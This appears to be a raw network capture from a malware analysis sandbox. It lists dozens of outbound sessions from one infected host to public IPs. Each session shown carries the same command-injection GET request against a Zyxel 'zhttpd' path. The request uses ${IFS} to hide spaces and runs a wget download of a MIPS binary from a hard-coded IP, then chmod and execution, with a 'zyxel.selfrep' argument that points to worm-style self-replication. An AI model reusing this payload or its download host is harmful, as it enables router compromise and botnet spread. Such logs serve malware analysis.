                                          Jan 14, 2024 15:46:06.794631004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2132192.168.2.2346038107.223.25.123443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.794657946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2133192.168.2.2355178121.161.25.123443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.794675112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2134192.168.2.2340266158.168.203.205443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.794723988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2135192.168.2.23604662.76.40.207443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.794754028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2136192.168.2.2337246196.104.61.0443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.794771910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2137192.168.2.2342630179.135.9.138443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.794811964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2138192.168.2.2342286213.211.158.201443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.794823885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2139192.168.2.2343772108.67.43.209443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.794825077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2140192.168.2.2340138111.24.74.243443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.794858932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2141192.168.2.2353258165.248.72.239443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.794871092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2142192.168.2.234064862.75.193.193443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.794933081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2143192.168.2.2348128122.245.255.64443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.794960022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2144192.168.2.2357672148.95.23.253443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.794991016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2145192.168.2.2359326222.21.194.163443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.795025110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2146192.168.2.234931666.193.18.238443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.795036077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2147192.168.2.2336618211.169.123.179443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.795049906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2148192.168.2.2351356222.143.70.95443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.795080900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2149192.168.2.2350018182.209.208.71443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.795110941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2150192.168.2.2355880135.229.114.21443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.795152903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2151192.168.2.2342256181.169.21.110443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.795190096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2152192.168.2.2352658121.254.48.249443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.795196056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2153192.168.2.23542749.101.183.46443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.795239925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2154192.168.2.234756647.185.236.216443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.795262098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2155192.168.2.233694282.183.117.254443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.795283079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2156192.168.2.2342838116.192.80.132443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.795320988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2157192.168.2.2336320112.208.112.204443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.795339108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2158192.168.2.233362092.207.100.120443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.795360088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2159192.168.2.2343652136.205.29.231443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.795402050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2160192.168.2.234611295.114.118.101443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.795414925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2161192.168.2.2334474175.197.240.151443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.795440912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2162192.168.2.233719045.43.206.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.795453072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2163192.168.2.2358202200.85.21.82443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.795469046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2164192.168.2.233557083.105.128.204443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.795488119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2165192.168.2.234996227.37.202.143443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.795514107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2166192.168.2.234102218.221.246.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.795550108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2167192.168.2.233476862.54.79.214443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.795577049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2168192.168.2.2353236132.68.204.252443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.795587063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2169192.168.2.2360790112.196.255.206443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.795589924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2170192.168.2.234778298.156.95.152443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.795609951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2171192.168.2.2358272103.20.110.73443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.795617104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2172192.168.2.2341406121.242.222.93443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.795679092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2173192.168.2.2348890153.205.10.56443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.795679092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2174192.168.2.2333230150.68.155.230443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.795711994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2175192.168.2.2345074100.179.166.140443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.795744896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2176192.168.2.2356618194.184.253.12443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.795764923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2177192.168.2.2346230111.228.245.163443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.795783997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2178192.168.2.235547841.163.207.188443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.795809984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2179192.168.2.2339594126.75.99.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.795845032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2180192.168.2.2359908182.143.79.251443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.795850039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2181192.168.2.23399429.30.241.108443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.795878887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2182192.168.2.235765872.215.59.2443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.795892000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2183192.168.2.23496485.89.205.67443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.795927048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2184192.168.2.2354088211.171.54.2443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.795928001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2185192.168.2.2352260197.119.75.233443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.795965910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2186192.168.2.233836624.100.171.213443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.795984983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2187192.168.2.2356314216.158.108.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.796014071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2188192.168.2.2342580216.205.195.149443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.796046972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2189192.168.2.235067823.65.94.228443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.796077013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2190192.168.2.2353220145.130.227.76443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.796083927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2191192.168.2.2342364122.109.11.30443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.796091080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2192192.168.2.2336326192.38.115.19443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.796122074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2193192.168.2.2351446204.101.25.0443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.796184063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2194192.168.2.234766023.127.181.80443
                                          TimestampBytes transferredDirectionData
